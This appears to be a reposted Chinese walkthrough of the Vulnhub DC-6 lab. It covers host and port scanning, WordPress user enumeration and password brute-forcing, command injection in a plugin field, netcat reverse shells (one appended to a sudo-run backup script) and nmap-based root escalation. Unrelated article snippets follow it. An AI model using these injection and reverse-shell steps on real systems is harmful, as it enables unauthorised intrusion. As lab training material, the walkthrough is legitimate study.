Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程

Vulnhub靶机 DC-6 详细渗透流程 打靶实战

目录

  • Vulnhub靶机 DC-6 详细渗透流程 打靶实战
    • 一、将靶机导入到虚拟机当中
    • 二、渗透测试
      • 主机发现
      • 端口扫描
      • 信息探测
      • web渗透
        • 目录爆破
        • 爆破后台密码
        • 反弹shell
        • 搜集有价值信息
        • SSH远程登录
        • 提权
        • 反弹jens用户权限的shell 提权利用

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-6,315/

image-20240420155007993

二、渗透测试

主机发现

通过使用arp-scan命令或者使用nmap命令进行主机发现

arp-scan -l

image-20240420155133549

端口扫描

nmap -p- 192.168.0.106

image-20240420155207724

开发22和80端口,且服务为SSH和HTTP服务,详细探测一下

nmap -p80 -sV -A 192.168.0.106
whatweb http://192.168.0.106

image-20240420155340749

信息探测

发现此web服务采用WordPress CMS

image-20240420155438359

访问web界面:访问前先配置一下hosts本地解析

image-20240420155540636

修改完成后即可完成本地域名解析,成功访问,并通过浏览器插件信息收集到此网站的一些服务信息和版本信息

image-20240420155521234

web渗透

通过信息收集得到使用WordPress CMS,那么直接使用kali的wpscan工具进行扫描探测,并枚举用户信息

wpscan --url http://wordy -e u

成功枚举出五位用户的信息,并保存到记事本当中

image-20240420155912465

目录爆破

爆破网站的目录,获取信息

dirsearch -u http://wordy -i 200

发现网站的登录界面,进行访问

image-20240420160058052

image-20240420160148033

爆破后台密码

通过我们之前得到的用户名信息,可进行密码的爆破

ps:根据作者的提示,从密码字典当中保存以下密码,可节省时间

image-20240420160339534

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan --url http://wordy -U user.txt -P passwords.txt

成功爆破出mark的用户名密码信息,登录后台

用户名:mark
密码:helpdesk01

image-20240420160757960

成功登入后台,发现有可执行命令的地方,在Activity monitor插件处

image-20240420161000851

反弹shell

此工具为ip测试工具,测试一下,输入127.0.0.1

image-20240420161331912

可成功,那么接下来进行拼接系统命令,测试可否正常回显

127.0.0.1 | ls

image-20240420161455509

发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听

//靶机:
127.0.0.1 | nc -e /bin/bash 192.168.0.107 8888

//kali
nc -lvvp 8888

由于输入长度有限制,可以修改前端代码或者使用burp直接修改数据包

image-20240420161845407

或者使用burp修改数据包

image-20240420162057811

成功接收shell,此shell权限为www-data权限,普通权限

image-20240420161908851

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20240420162203112

搜集有价值信息

当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看

jens家目录下的文件为一个shell脚本,内容为打包网站的信息

image-20240420171213647

SSH远程登录

mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham

ssh graham@192.168.0.106

image-20240420171400193

image-20240420171442670

提权

查找suid权限内容

find / -perm -u=s -type f 2>/dev/null

image-20240420171542905

sudo利用失败

image-20240420171753483

image-20240420171820897

/etc目录下也无可利用文件,/etc/passwd等文件均无法利用

反弹jens用户权限的shell 提权利用
sudo -l

查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell

image-20240420171842323

echo "nc -e /bin/bash 192.168.0.107 6666" >> backups.sh 

image-20240420172048916

sudo -u jens /home/jens/backups.sh

image-20240420172328091

kali端成功接收到shell

image-20240420172317396

sudo -l 再次查看一下jens用户下的有无root用户可执行的命令或者脚本,发现存在nmap命令,并以root权限执行

image-20240420172416627

接下来就是利用nmap进行提权,首先创建一个脚本

touch root_shell.sh
echo 'os.execute("/bin/sh")' > root_shell.sh
sudo nmap --script=root_shell.sh

成功提权,通关

image-20240420172732668

文章不妥之处,欢迎批评指正!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/561585.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Mac 下安装PostgreSQL经验

使用homebrew终端软件管理器去安装PostgreSQL 如果没有安装brew命令执行以下命令 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 沙果开源物联网系统 SagooIoT | SagooIoT 1.使用命令安装postgreSQL brew i…

制作一个RISC-V的操作系统十二-定时器中断

文章目录 CLINT定时器中断mtimemtimecmp机制总体框架流程时间节拍系统时钟代码 CLINT 产生软件中断和定时器中断 定时器中断 mtime 类似计数器,按照硬件对应的固定频率递增 上电后会自动复位为0,有硬件自动完成 mtimecmp 需要自己设置&#xff0…

【SpringBoot实战篇】获取用户详细信息

1 明确需求 1需要获取用户详细信息 2 接口文档 1基本信息 2请求参数 无 3 响应数据 响应数据类型:application/json 响应参数说明: 响应数据样例 3 思路分析 1用户名在请求头里获取 4 开发 4.1 控制器usercontroller GetMapping("/userInfo")p…

Vue3——组件基础

组件基础 1. 组件定义与使用 1.1 代码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>组件基础&l…

iZotope RX 10 音频修复和增强工具 mac/win

iZotope RX 10 for Mac是一款出色的音频修复和增强工具&#xff0c;凭借其卓越的音频处理技术&#xff0c;能够轻松应对各种音频问题。 无论是背景噪音、回声还是失真&#xff0c;RX 10都能精准去除&#xff0c;还原清晰纯净的音频。同时&#xff0c;它还提供了丰富的增强工具&…

小红书电商运营实战课,从0打造全程实操(65节视频课)

课程内容&#xff1a; 1.小红书的电商介绍 .mp4 2.小红书的开店流程,mp4 3.小红书店铺基础设置介绍 ,mp4 4.小红书店铺产品上架流程 .mp4 5.客服的聊天过程和子账号建立 .mp4 6.店铺营销工具使用和后台活动参加 .mp4 7.小红书产品上架以及拍单教程,mp4 8.小红书如何选品…

第15届蓝桥杯题解

A题 结果&#xff1a;2429042904288 思路很简单 前20个数分别是 20 24 40 48 60 72 80 96 100 120 140 144 160 168 180 192 200 216 220 240 第2 4 6 8 12 ...n个数分别是24的 1倍 2倍 3倍 4倍 6倍 n/2倍 所以第202420242024 个数就是 24的 101210121012倍 B题 答案&am…

在PostgreSQL中如何实现递归查询,例如使用WITH RECURSIVE构建层次结构数据?

文章目录 解决方案使用WITH RECURSIVE进行递归查询示例代码 总结 在PostgreSQL中&#xff0c;递归查询是一种非常强大的工具&#xff0c;它可以用来查询具有层次结构或树形结构的数据。例如&#xff0c;你可能会在员工-经理关系、目录结构或组织结构图中遇到这样的数据。为了处…

嵌入式物联网实战开发笔记-乐鑫ESP32开发环境ESP-IDF搭建【doc.yotill.com】

乐鑫ESP32入门到精通项目开发参考百例下载&#xff1a; 链接&#xff1a;百度网盘 请输入提取码 提取码&#xff1a;4e33 3.1 ESP-IDF 简介 ESP-IDF&#xff08;Espressif IoT Development Framework&#xff09;是乐鑫&#xff08;Espressif Systems&#xff09;为 ESP 系列…

跨站攻击CSRF实验

1.low等级 先利用Burp抓包 将get响应的url地址复制&#xff0c;发到网页上&#xff08;Low等级到这完成&#xff09; Medium&#xff1a; 再将抓到的包发到Repeater上,对请求中的Referer进行修改&#xff0c;修改成和url一样的地址&#xff0c;修改成功。 在这里修改后发送 然…

Java中的四种引用类型

6.Java中的引用类型 1.强引用 一个对象A被局部变量、静态变量引用了就产生了强引用。因为局部变量、静态变量都是被GC Root对象关联上的&#xff0c;所以被引用的对象A&#xff0c;就在GC Root的引用链上了。只要这一层关系存在&#xff0c;对象A就不会被垃圾回收器回收。所以只…

Fannel和Calico

一 1、路由器下面每一个端口都是一个vlan,隔离了广播包 192.168.1.0和192.168.2.0他们属于不同的vlan,没有三层交换机或者路由器,他们通不了信 不在同一个vlan,也就是子网,包就会走向网关(也就是路由器那里,路由器有路由表。查看目的地192.168.2.0在b口,从b口出去vlan…

Axure RP 9中文激活版:专业原型设计工具mac/win

Axure RP 9是一款由美国Axure Software Solution公司开发的专业原型设计工具。它凭借强大的交互功能和丰富的设计素材&#xff0c;为产品经理、UI设计师、交互设计师等用户提供了高效、便捷的原型设计体验。 Axure RP 9支持快速创建线框图、流程图、原型和规格说明文档&#xf…

Python可视化数据分析-饼状图

一、前言 饼状图&#xff08;Pie Chart&#xff09;是一种常用的数据可视化图表&#xff0c;用于展示数据中各部分的占比关系。Python 中有多种库可以用于绘制饼状图&#xff0c;比较常用的包括 matplotlib、pyecharts和 plotly 等。 二、使用 matplotlib 绘制饼状图 import…

【Java并发知识总结 | 第八篇】Java并发线程知识总结

文章目录 8.Java线程知识总结8.1线程定义8.2Java中创建线程的三种方式8.2.1继承Thread类8.2.2实现Runnable接口8.2.3实现Callable接口&#xff08;与线程池搭配使用&#xff09;8.2.4小结 8.3线程的六种状态8.4sleep()和wait()的区别8.5线程上下文切换8.6线程之间的通信方式8.6…

【正则表达式】正则表达式基本语法元素

目录 字符类量词边界匹配逻辑和分组转义和特殊字符验证正则表达式是否能够成功提取数据 字符类 .&#xff1a;匹配除换行符之外的任何单个字符。 [abc]&#xff1a;匹配方括号内的任何字符。 [^abc]&#xff1a;匹配不在方括号内的任何字符。 [a-z]&#xff1a;匹配任何小写字…

51单片机入门_江协科技_31~32_OB记录的自学笔记_LCD1602液晶显示屏

31. LCD1602 31.1. LCD1602介绍 •LCD1602&#xff08;Liquid Crystal Display&#xff09;液晶显示屏是一种字符型液晶显示模块&#xff0c;可以显示ASCII码的标准字符和其它的一些内置特殊字符&#xff0c;还可以有8个自定义字符 •显示容量&#xff1a;162个字符&#xff0c…

使用Redis实现全局唯一ID

系列文章目录 文章目录 系列文章目录前言 前言 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到网站&#xff0c;这篇文章男女通用&#xff0c;看懂了就去分享给你的码吧。 在分布式系统中&am…

插入排序动态展示3(Python可视化源代码)

修改了“开始”命令按钮&#xff0c;每次单击“开始”&#xff0c;都重新排序。 Python代码 import tkinter as tk import random import timeclass InsertionSortVisualizer:def __init__(self, root, canvas_width800, canvas_height400, num_bars10):self.root rootself.…

【软考中级】21 真题整理

选择题 1、在CPU中&#xff0c;用&#xff08; &#xff09;给出将要执行的下一条指令在内存中的地址。 (A) 程序计数器 (B) 指令寄存器 (C) 主存地址寄存器 (D) 状态条件寄存器 试题答案&#xff1a;A 试题解析&#xff1a; A 选项程序计数器PC&#xff1a;存储下一条要执行指…